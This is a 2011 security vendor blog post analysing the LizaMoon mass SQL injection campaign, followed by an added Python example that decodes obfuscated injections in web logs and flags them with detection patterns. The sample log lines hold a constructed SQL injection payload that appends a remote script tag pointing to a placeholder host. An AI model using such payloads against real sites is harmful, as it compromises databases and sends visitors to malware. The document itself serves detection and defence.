Analyzing a Mass SQL Injection Attack - Lizamoon
Posted by John Kuhn on March 31, 2011 at 5:34 PM EDT.
Over the last few days we have been tracking a mass SQL injection attack that was first blogged by Websense on March 29th. These types of threats are nothing new to us in IBM Managed Security Services, as we have been tracking similar attacks for years. We are not seeing nearly the volume we saw with the “asprox” and “dnf666” attacks. The reason for this is simple: these attacks appear to originate from a few choice IPs, which correspond to the site whose URL is being injected into the victims' databases. The Asprox SQL injection attack, for instance, used a botnet to perform the mass injection, giving it far more reach and bandwidth.
This new wave of attacks was named LizaMoon after a URL that was ultimately injected into the SQL tables of the target site. These attacks use a different technique than those witnessed previously; however, they still achieve the same goal: redirection to a malicious website.
The SQL Injection in its raw form looks like this:

Once ASCII codes are decoded, the SQL string translates to:

If the injection is successful, this snippet of code would be riddled throughout the compromised database of the site, redirecting unsuspecting Internet users to the attackers' malicious payload. The result is an attempt to get the victims of the drive-by download to install RogueAV, something the security industry has been battling for years now.
Protection from this attack is provided by the SQL_Injection signature in our Proventia™ products.
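The decoding step described above (turning the ASCII-coded string back into readable SQL) is exactly what a defender needs to do before pattern-matching web logs. The following is an added example, not code from the original post or from IBM: it expands CHAR()-concatenated and hex-literal payloads found in access-log query strings and flags the indicators of a LizaMoon-style injection (a mass UPDATE of text columns plus an injected script tag). The log lines, the payload text and the host `example.invalid` are constructed for the demonstration.

```python
import re
from urllib.parse import quote, unquote_plus

# Indicators a defender looks for in the *decoded* text of a LizaMoon-style
# injection: a mass UPDATE of text columns and an injected <script src=...> tag.
INDICATORS = {
    "script_tag": re.compile(r"<script\s+src=", re.I),
    "mass_update": re.compile(r"\bupdate\b.+?\bset\b", re.I | re.S),
    "schema_walk": re.compile(r"\b(sysobjects|syscolumns|information_schema)\b", re.I),
}
CHAR_CHAIN = re.compile(r"(?:CHAR\(\d+\)\s*\+\s*)+CHAR\(\d+\)", re.I)
HEX_LITERAL = re.compile(r"0x([0-9a-f]{8,})", re.I)

def decode_obfuscation(sql: str) -> str:
    """Expand CHAR(n)+CHAR(n)+... chains and long 0x hex literals into the
    string they encode, so the payload can be read and pattern-matched."""
    def expand_chain(m):
        return "'" + "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0))) + "'"
    def expand_hex(m):
        try:  # NVARCHAR payloads are UTF-16LE; dropping NULs recovers the ASCII text
            return "'" + bytes.fromhex(m.group(1)).decode("ascii").replace("\x00", "") + "'"
        except ValueError:  # odd length or non-ASCII bytes: not text, keep as is
            return m.group(0)
    return HEX_LITERAL.sub(expand_hex, CHAR_CHAIN.sub(expand_chain, sql))

def analyse_request(log_line: str) -> dict:
    """URL-decode the query string of one access-log line, de-obfuscate it and
    report which indicators fire on the decoded text."""
    m = re.search(r'"(?:GET|POST) (\S+)', log_line)
    target = m.group(1) if m else ""
    query = unquote_plus(target.split("?", 1)[1]) if "?" in target else ""
    decoded = decode_obfuscation(query)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return {"decoded": decoded, "indicators": hits, "suspicious": bool(hits)}

# --- constructed sample data (not the post's real payload or logs) ------------
DEMO_SQL = "update news set body=body+'<script src=http://example.invalid/x.js></script>'"
def to_char_chain(text: str) -> str:
    return "+".join(f"CHAR({ord(c)})" for c in text)

SAMPLE_LOG = [  # same payload as a CHAR() chain, as a hex literal, and a clean request
    '10.0.0.5 - - [29/Mar/2011:10:12:01 +0000] "GET /view.asp?id=1;' +
    quote(f"declare @s varchar(4000);set @s={to_char_chain(DEMO_SQL)};exec(@s)--", safe="") +
    ' HTTP/1.1" 200 512',
    '10.0.0.6 - - [29/Mar/2011:10:12:02 +0000] "GET /view.asp?id=1;exec(0x' +
    DEMO_SQL.encode().hex() + ') HTTP/1.1" 200 512',
    '10.0.0.7 - - [29/Mar/2011:10:12:03 +0000] "GET /view.asp?id=42 HTTP/1.1" 200 512',
]
```

Running `analyse_request` over `SAMPLE_LOG` flags the first two lines with `script_tag` and `mass_update` and leaves the third clean; the IDS signature mentioned below does the same matching on the wire rather than after the fact.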
We will be tracking this attack and providing any additional details in the future.

